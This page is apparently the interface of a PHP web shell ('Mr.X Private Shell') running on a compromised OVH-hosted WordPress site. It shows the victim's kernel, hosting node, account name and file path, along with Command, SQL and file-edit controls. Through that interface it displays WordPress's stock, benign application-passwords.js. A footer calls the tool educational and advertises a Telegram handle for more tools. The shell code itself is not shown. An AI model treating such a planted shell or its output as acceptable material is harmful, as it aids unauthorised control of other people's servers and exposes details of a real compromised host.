Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/old/////wp-admin/js      ( Reset | Go to )
File Name: application-passwords.js
Edit
/**
 * @output wp-admin/js/application-passwords.js
 */

( function( $ ) {
    var $appPassSection = $( '#application-passwords-section' ),
        $newAppPassForm = $appPassSection.find( '.create-application-password' ),
        $newAppPassField = $newAppPassForm.find( '.input' ),
        $newAppPassButton = $newAppPassForm.find( '.button' ),
        $appPassTwrapper = $appPassSection.find( '.application-passwords-list-table-wrapper' ),
        $appPassTbody = $appPassSection.find( 'tbody' ),
        $appPassTrNoItems = $appPassTbody.find( '.no-items' ),
        $removeAllBtn = $( '#revoke-all-application-passwords' ),
        tmplNewAppPass = wp.template( 'new-application-password' ),
        tmplAppPassRow = wp.template( 'application-password-row' ),
        userId = $( '#user_id' ).val();

    $newAppPassButton.on( 'click', function( e ) {
        e.preventDefault();

        if ( $newAppPassButton.prop( 'aria-disabled' ) ) {
            return;
        }

        var name = $newAppPassField.val();

        if ( 0 === name.length ) {
            $newAppPassField.trigger( 'focus' );
            return;
        }

        clearNotices();
        $newAppPassButton.prop( 'aria-disabled', true ).addClass( 'disabled' );

        var request = {
            name: name
        };

        /**
         * Filters the request data used to create a new Application Password.
         *
         * @since 5.6.0
         *
         * @param {Object} request The request data.
         * @param {number} userId  The id of the user the password is added for.
         */
        request = wp.hooks.applyFilters( 'wp_application_passwords_new_password_request', request, userId );

        wp.apiRequest( {
            path: '/wp/v2/users/' + userId + '/application-passwords?_locale=user',
            method: 'POST',
            data: request
        } ).always( function() {
            $newAppPassButton.removeProp( 'aria-disabled' ).removeClass( 'disabled' );
        } ).done( function( response ) {
            $newAppPassField.val( '' );
            $newAppPassButton.prop( 'disabled', false );

            $newAppPassForm.after( tmplNewAppPass( {
                name: response.name,
                password: response.password
            } ) );
            $( '.new-application-password-notice' ).trigger( 'focus' );

            $appPassTbody.prepend( tmplAppPassRow( response ) );

            $appPassTwrapper.show();
            $appPassTrNoItems.remove();

            /**
             * Fires after an application password has been successfully created.
             *
             * @since 5.6.0
             *
             * @param {Object} response The response data from the REST API.
             * @param {Object} request  The request data used to create the password.
             */
            wp.hooks.doAction( 'wp_application_passwords_created_password', response, request );
        } ).fail( handleErrorResponse );
    } );

    $appPassTbody.on( 'click', '.delete', function( e ) {
        e.preventDefault();

        if ( ! window.confirm( wp.i18n.__( 'Are you sure you want to revoke this password? This action cannot be undone.' ) ) ) {
            return;
        }

        var $submitButton = $( this ),
            $tr = $submitButton.closest( 'tr' ),
            uuid = $tr.data( 'uuid' );

        clearNotices();
        $submitButton.prop( 'disabled', true );

        wp.apiRequest( {
            path: '/wp/v2/users/' + userId + '/application-passwords/' + uuid + '?_locale=user',
            method: 'DELETE'
        } ).always( function() {
            $submitButton.prop( 'disabled', false );
        } ).done( function( response ) {
            if ( response.deleted ) {
                if ( 0 === $tr.siblings().length ) {
                    $appPassTwrapper.hide();
                }
                $tr.remove();

                addNotice( wp.i18n.__( 'Application password revoked.' ), 'success' ).trigger( 'focus' );
            }
        } ).fail( handleErrorResponse );
    } );

    $removeAllBtn.on( 'click', function( e ) {
        e.preventDefault();

        if ( ! window.confirm( wp.i18n.__( 'Are you sure you want to revoke all passwords? This action cannot be undone.' ) ) ) {
            return;
        }

        var $submitButton = $( this );

        clearNotices();
        $submitButton.prop( 'disabled', true );

        wp.apiRequest( {
            path: '/wp/v2/users/' + userId + '/application-passwords?_locale=user',
            method: 'DELETE'
        } ).always( function() {
            $submitButton.prop( 'disabled', false );
        } ).done( function( response ) {
            if ( response.deleted ) {
                $appPassTbody.children().remove();
                $appPassSection.children( '.new-application-password' ).remove();
                $appPassTwrapper.hide();

                addNotice( wp.i18n.__( 'All application passwords revoked.' ), 'success' ).trigger( 'focus' );
            }
        } ).fail( handleErrorResponse );
    } );

    $appPassSection.on( 'click', '.notice-dismiss', function( e ) {
        e.preventDefault();
        var $el = $( this ).parent();
        $el.removeAttr( 'role' );
        $el.fadeTo( 100, 0, function () {
            $el.slideUp( 100, function () {
                $el.remove();
                $newAppPassField.trigger( 'focus' );
            } );
        } );
    } );

    $newAppPassField.on( 'keypress', function ( e ) {
        if ( 13 === e.which ) {
            e.preventDefault();
            $newAppPassButton.trigger( 'click' );
        }
    } );

    // If there are no items, don't display the table yet.  If there are, show it.
    if ( 0 === $appPassTbody.children( 'tr' ).not( $appPassTrNoItems ).length ) {
        $appPassTwrapper.hide();
    }

    /**
     * Handles an error response from the REST API.
     *
     * @since 5.6.0
     *
     * @param {jqXHR} xhr The XHR object from the ajax call.
     * @param {string} textStatus The string categorizing the ajax request's status.
     * @param {string} errorThrown The HTTP status error text.
     */
    function handleErrorResponse( xhr, textStatus, errorThrown ) {
        var errorMessage = errorThrown;

        if ( xhr.responseJSON && xhr.responseJSON.message ) {
            errorMessage = xhr.responseJSON.message;
        }

        addNotice( errorMessage, 'error' );
    }

    /**
     * Displays a message in the Application Passwords section.
     *
     * @since 5.6.0
     *
     * @param {string} message The message to display.
     * @param {string} type    The notice type. Either 'success' or 'error'.
     * @returns {jQuery} The notice element.
     */
    function addNotice( message, type ) {
        var $notice = $( '<div></div>' )
            .attr( 'role', 'alert' )
            .attr( 'tabindex', '-1' )
            .addClass( 'is-dismissible notice notice-' + type )
            .append( $( '<p></p>' ).text( message ) )
            .append(
                $( '<button></button>' )
                    .attr( 'type', 'button' )
                    .addClass( 'notice-dismiss' )
                    .append( $( '<span></span>' ).addClass( 'screen-reader-text' ).text( wp.i18n.__( 'Dismiss this notice.' ) ) )
            );

        $newAppPassForm.after( $notice );

        return $notice;
    }

    /**
     * Clears notice messages from the Application Passwords section.
     *
     * @since 5.6.0
     */
    function clearNotices() {
        $( '.notice', $appPassSection ).remove();
    }
}( jQuery ) );

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL